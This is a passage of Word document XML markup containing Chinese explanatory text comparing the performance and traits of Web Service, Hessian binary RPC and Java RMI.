          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Web Service</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的效率低下是众所周知的，平均来看，</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Web Service</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的通讯毫时是</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>RMI</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>倍</w:t>
      </w:r>
      <w:r w:rsidR="00335A07" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00DD44A4" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Hessian</w:t>
      </w:r>
      <w:r w:rsidR="00DD44A4" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>较</w:t>
      </w:r>
      <w:r w:rsidR="00DD44A4" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>RMI</w:t>
      </w:r>
      <w:r w:rsidR="00DD44A4" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>要慢</w:t>
      </w:r>
      <w:r w:rsidR="00DD44A4" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>20%</w:t>
      </w:r>
      <w:r w:rsidR="00DD44A4" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>左右，但这只是在数据量特别大，数据结构很复杂的情况下才能体现出来，中等或少量数据时，</w:t>
      </w:r>
      <w:r w:rsidR="00DD44A4" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Hessian</w:t>
      </w:r>
      <w:r w:rsidR="00DD44A4" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>并不比</w:t>
      </w:r>
      <w:r w:rsidR="00DD44A4" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>RMI</w:t>
      </w:r>
      <w:r w:rsidR="00DD44A4" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>慢</w:t>
      </w:r>
      <w:r w:rsidR="00DD44A4" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="001C3386" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00FC238A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001C3386" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Hessian </w:t>
      </w:r>
      <w:r w:rsidR="001C3386" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是一个轻量级的</w:t>
      </w:r>
      <w:r w:rsidR="001C3386" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>remoting </w:t>
      </w:r>
      <w:r w:rsidR="001C3386" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>工具</w:t>
      </w:r>
      <w:r w:rsidR="001C3386" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="001C3386" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>使用简单的方法提供</w:t>
      </w:r>
      <w:r w:rsidR="001C3386" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>RMI</w:t>
      </w:r>
      <w:r w:rsidR="001C3386" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>功能。</w:t>
      </w:r>
      <w:r w:rsidR="001C3386" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001C3386" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>相比</w:t>
      </w:r>
      <w:r w:rsidR="001C3386" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>WebService Hessian</w:t>
      </w:r>
      <w:r w:rsidR="001C3386" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>更简单</w:t>
      </w:r>
      <w:r w:rsidR="001C3386" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="001C3386" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>快捷采用的是二进制</w:t>
      </w:r>
      <w:r w:rsidR="001C3386" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>RPC</w:t>
      </w:r>
      <w:r w:rsidR="001C3386" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>协议</w:t>
      </w:r>
      <w:r w:rsidR="001C3386" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidR="001C3386" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>很适用于二级制数据。</w:t>
      </w:r>
      <w:r w:rsidR="00386903" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>hessian</w:t>
      </w:r>
      <w:r w:rsidR="00386903" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>类似于</w:t>
      </w:r>
      <w:r w:rsidR="00386903" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Webservice</w:t>
      </w:r>
      <w:r w:rsidR="00386903" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，但是它不使用</w:t>
      </w:r>
      <w:r w:rsidR="00386903" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>soap</w:t>
      </w:r>
      <w:r w:rsidR="00386903" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>协议，它把协议报文封装到</w:t>
      </w:r>
      <w:r w:rsidR="00386903" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidR="00386903" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>封包中，通过</w:t>
      </w:r>
      <w:r w:rsidR="00386903" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00386903" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>信道传输。是一种高效简洁的远程调用框架，它采用的是二进制</w:t>
      </w:r>
      <w:r w:rsidR="00386903" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>RPC</w:t>
      </w:r>
      <w:r w:rsidR="00386903" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>协议（</w:t>
      </w:r>
      <w:r w:rsidR="00386903" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Binary</w:t>
      </w:r>
      <w:r w:rsidR="00386903" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>），具有轻量、传输量小、</w:t>
      </w:r>
      <w:r w:rsidR="00386903" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>平台无关的特点，特别适合于目前网络带宽比较小的手机网络应用项目</w:t>
      </w:r>
      <w:r w:rsidR="001C3386" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001C3386" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00020876">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001C3386" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>RMI </w:t>
      </w:r>
      <w:r w:rsidR="001C3386" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidR="001C3386" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidR="001C3386" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的一组拥护开发分布式应用程序的</w:t>
      </w:r>
      <w:r w:rsidR="001C3386" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>API  RMI</w:t>
      </w:r>
      <w:r w:rsidR="001C3386" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidR="001C3386" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidR="001C3386" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>语言接口定义了远程对象。</w:t>
      </w:r>
      <w:r w:rsidR="00E95E2F" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>RMI</w:t>
      </w:r>
      <w:r w:rsidR="00E95E2F" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidR="00E95E2F" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidR="00E95E2F" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>语言本身提供的通讯协议，稳定高效，是</w:t>
      </w:r>
      <w:r w:rsidR="00E95E2F" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>EJB</w:t>
      </w:r>
      <w:r w:rsidR="00E95E2F" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的基础。但它</w:t>
      </w:r>
      <w:r w:rsidR="00E95E2F" w:rsidRPr="00020876">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>只能用于</w:t>
      </w:r>
      <w:r w:rsidR="00E95E2F" w:rsidRPr="00020876">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JAVA</w:t>
      </w:r>
      <w:r w:rsidR="00E95E2F" w:rsidRPr="00020876">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>程序之间的通讯</w:t>
